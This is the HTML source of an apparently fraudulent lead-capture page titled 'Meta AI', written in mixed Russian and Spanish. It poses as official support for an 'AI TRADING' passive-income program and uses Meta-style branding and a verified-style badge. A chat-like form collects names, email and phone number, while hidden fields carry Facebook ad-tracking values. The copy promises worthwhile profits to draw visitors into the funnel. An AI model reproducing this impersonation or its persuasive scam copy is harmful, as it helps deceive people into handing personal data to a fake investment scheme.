<!DOCTYPE html><html lang="ru"><head>
    
    <meta name="robots" content="noindex, nofollow">
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta http-equiv="Cache-Control" content="no-cache">
    <title>
        Meta AI
    </title>
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="css/form.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <style>
    </style>
</head>
<body class="add-scroll">
<div class="body" style="transform: translateY(0px);">
    <div class="content">
        <div class="header">
            <div class="header__body">
                <div class="header__name">
                    <div class="header__avatar">
                        <img src="images/logo.PNG" alt="">
                    </div>
                    <div class="header__desc">
                        <div class="header__desc-title">
                            <p>AI TRADING </p>
                            <img  src="images/meta-done.png" alt="">
                        </div>
                        <p class="header__desc-text">
                            Soporte
                        </p>
                    </div>
                </div>
                <div class="header__modal">
                    <button type="button" data-modal-close="">
                        <img src="images/btn-menu.png" alt="">
                    </button>
                    <p>
                        Чтобы связаться со специалистом, пройдите диалог до конца.
                    </p>
                </div>
                <div class="header__icons">
                    <button type="button" data-modal="">
                        <svg width="23" height="24" viewBox="0 0 23 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M9.37815 13.9919L9.5081 14.1218C11.7457 16.2882 13.6184 17.3056 15.1261 17.174L15.5605 16.7687C16.1785 16.2064 16.6444 15.85 16.9584 15.6994C17.612 15.3859 18.0707 15.3922 19.3094 16.0625C20.939 16.9442 22.0642 17.9691 22.6392 18.5441C23.1731 19.078 23.0072 19.9977 22.8197 20.4057L22.6955 20.6333C22.3619 21.2129 21.1521 23.1249 18.8334 23.4521C17.9523 23.5764 16.8399 23.4624 15.5357 23.0696C12.7419 22.1024 9.95981 20.3297 7.18932 17.7514L6.69661 17.2834L6.69197 17.288L6.45419 17.046L6.21199 16.808L6.21664 16.8034L5.74857 16.3107C3.17035 13.5402 1.39763 10.7581 0.430416 7.96428C0.0376067 6.66006 -0.0763732 5.54772 0.047946 4.66655C0.39822 2.18383 2.56566 0.972407 2.96871 0.746715L3.00964 0.723616C3.35849 0.522447 4.38095 0.285854 4.95591 0.860816L5.22814 1.14078C5.82079 1.76756 6.68177 2.79378 7.43755 4.19059C8.1078 5.42934 8.11405 5.88801 7.80058 6.54161C7.61655 6.92534 7.125 7.53612 6.32595 8.37394C6.19439 9.88161 7.21179 11.7543 9.37815 13.9919Z" fill="#0584FE"></path>
                        </svg>
                    </button>
                    <div style="cursor: pointer;">
                        <svg width="28" height="18" viewBox="0 0 28 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M15.7 0C17.7987 0 19.5 1.7269 19.5 3.85714V14.1429C19.5 16.2731 17.7987 18 15.7 18H4.3C2.20132 18 0.5 16.2731 0.5 14.1429V3.85714C0.5 1.7269 2.20132 0 4.3 0H15.7ZM27.3658 4.02231C27.4538 4.17312 27.5 4.34278 27.5 4.5153V13.4849C27.5 14.0455 27.0224 14.5 26.4333 14.5C26.2521 14.5 26.0738 14.456 25.9153 14.3723L22.1858 12.4005C21.7625 12.1767 21.5 11.7521 21.5 11.2912V6.70894C21.5 6.24812 21.7625 5.82352 22.1858 5.59973L25.9153 3.62793C26.4303 3.35566 27.0797 3.53224 27.3658 4.02231Z" fill="#D2D2D2"></path>
                        </svg>
                    </div>
                </div>
            </div>
        </div>
        <form class="register-form main-flex register-form">

            <input type="hidden" name="offerId" id="offerId" value="87">
            
<input type="hidden" name="ipAddress" id="ipAddress">
<input type="hidden" name="pixel" id="pixel-input" value="655769773408907">
<input type="hidden" name="traffic_source" id="traffic_source_name" value="Facebook">
<input type="hidden" name="utm_creative" id="utm_creative" value="">
<input type="hidden" name="utm_placement" id="utm_placement" value="%7B%7Bplacement%7D%7D">
<input type="hidden" name="ad_id" id="ad_id" value="%7B%7Bad.id%7D%7D">
<input type="hidden" name="click_id" value="28tgr2a3dovk">
<input type="hidden" name="userId" value="26">
<input type="hidden" name="language" value="ru">
<input type="hidden" name="source_type" id="source_type" value="{source_type}">
<input type="hidden" name="domain" value="">
<input type="hidden" name="description" id="description" value="">

            <div class="chat">
                <div class="chat-absolute">
                    <div class="main__sup-subtitle">
                        Apoyo oficial a los usuarios del proyecto de ingresos pasivos  <br> de "AI TRADING"
                    </div>
                    <p class="message-time"></p>
                </div>
                <div class="chat-content-list chat-content-list-1"></div>
                <div class="user--name">
                    <div class="form-input-main">
                        <input type="text" class="form-input" name="first_name" placeholder="Nombre">
                        <div style="color: red" class="invalid-feedback"></div>
                    </div>
                    <div class="form-input-main">
                        <input type="text" class="form-input" name="last_name" placeholder="Apellido">
                        <div style="color: red" class="invalid-feedback"></div>
                    </div>
                    <button type="button" class="button--user button-name-next" data-btn-name="">Siguiente</button>
                </div>
                <div class="chat-content-list chat-content-list-2"></div>
                <div class="user--email">
                    <div class="form-input-main">
                        <input type="email" name="email" placeholder="correo electrónico">
                        <div style="color: red" class="invalid-feedback"></div>
                    </div>
                    <button type="button" class="button--user button-email-next" data-btn-email="">Siguiente</button>
                </div>
                <div class="chat-content-list chat-content-list-3"></div>
                <div class="user--phone">
                    <div class="form-input-main">
                        <input class="form-input" type="tel" name="phns" autocomplete="off">
                        <div style="color: red" class="invalid-feedback"></div>
                    </div>
                    <button type="button" class="button--user button-phone-next" data-btn-phone="">Siguiente</button>
                </div>
                <div class="chat-content-list chat-content-list-4"></div>
                <div class="form--button hide">
                    <button name="submitBtn" type="submit" class="btn_send">Empezar</button>
                    <center><img class="loading-animation" src="images/load.gif" alt="Loading..." style="display: none;"></center>
                </div>
                <div id="down-box"></div>
            </div>
            <div class="main__sup">
                <div class="main__sup-logo">
                    <img src="images/logo.svg" alt="">
                </div>
                <div class="main__sup-title">
                    <p>
                        AI TRADING 
                    </p>
                    <img src="images/meta-done.png" alt="">
                </div>
                <div class="main__sup-subtitle">
                    Apoyo oficial a los usuarios del proyecto de ingresos pasivos de "AI TRADING"
                </div>
                <div class="main__sup-btn">
                    <p>
                        Póngase en contacto con un especialista
                    </p>
                    <img src="images/meta-arrow.png" alt="">
                </div>
                <p class="meta__sup-text">
                    Para empezar a utilizar el programa tienes que terminar el diálogo con nosotros. No le llevará más de 5 minutos. Créeme, los beneficios que obtendrás merecen la pena.
                </p>
            </div>
        </form>
    </div>
</div>
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<link rel="stylesheet" href="css/intlTelInput.min_1.css">
<style>.error {
        background-color: rgba(255, 0, 0, 0.5) !important;
        color: #fff !important;
    }
    .error::placeholder {
        color: #fff !important;
    }
    .valid {
        background-color: rgba(0, 255, 0, 0.5) !important;
    }
    .modal_phone {
        opacity: 1;
        position: fixed;
        top: 0;
        bottom: 0;
        right: 0;
        left: 0;
        z-index: 99999;
        display: none;
        outline: 0;
        padding-right: 15px;
        justify-content: center;
        align-items: center;
        background-color: rgba(0, 0, 0, 0.4);
        overflow-x: hidden;
        overflow-y: auto;
        color: #000;
    }
    .modal_phone.open_phone {
        display: flex;
    }
    .modal-open_phone {
        overflow: hidden;
    }
    .modal-dialog_phone {
        position: relative;
        width: 100%;
        max-width: 32rem;
        padding: 1rem;
        box-sizing: border-box;
    }
    .modal-content_phone {
        display: flex;
        flex-direction: column;
        pointer-events: auto;
        background-color: #fff;
        background-clip: padding-box;
        border: 1px solid rgba(0, 0, 0, 0.2);
        border-radius: 0.3rem;
        outline: 0;
    }
    .modal-header_phone {
        display: flex;
        align-items: center;
        padding: 1rem 1rem;
    }
    .modal-header_phone {
        justify-content: space-between;
        border-top-left-radius: 0.3rem;
        border-top-right-radius: 0.3rem;
    }
    .modal-body_phone {
        position: relative;
        flex: 1 1 auto;
        padding: 1rem;
    }
    .modal-title_phone {
        font-size: 1.25rem;
        font-weight: 600;
    }
    .close-button_phone {
        font-size: 1.5rem;
        font-weight: 700;
        line-height: 1;
        opacity: 0.5;
        background-color: transparent;
        border: 0;
        cursor: pointer;
        padding: 1rem 1rem;
        margin: -1rem -1rem -1rem auto;
    }
</style>
<div id="modal_phone" class="modal_phone fade_phone" tabindex="-1">
    <div class="modal-dialog_phone">
        <div class="modal-content_phone">
            <div class="modal-header_phone">
                <h5 class="modal-title_phone">
                    Número de teléfono incorrecto
                </h5>
                <button type="button" class="close-button_phone" id="close-button_phone">×</button>
            </div>
            <div class="modal-body_phone">
                Lo sentimos. El programa no está disponible en su región.
            </div>
        </div>
    </div>
</div>
<script>
    const openModal = () => {
        document.getElementById("modal_phone").classList.add("open_phone");
        document.body.classList.add("modal-open_phone");
    };

    const closeModal = () => {
        document.getElementById("modal_phone").classList.remove("open_phone");
        document.body.classList.remove("modal-open_phone");
    };

    document.getElementById("close-button_phone").addEventListener("click", closeModal);
</script>
<script src="js/player.js"></script>
<link rel="stylesheet" href="css/turn-sound.css">
<script src="js/turn-sound.js"></script>
<link rel="stylesheet" href="css/intlTelInput.min.css">
<script src="js/intlTelInput.min.js"></script>
<script src="js/form.js"></script>

</body></html>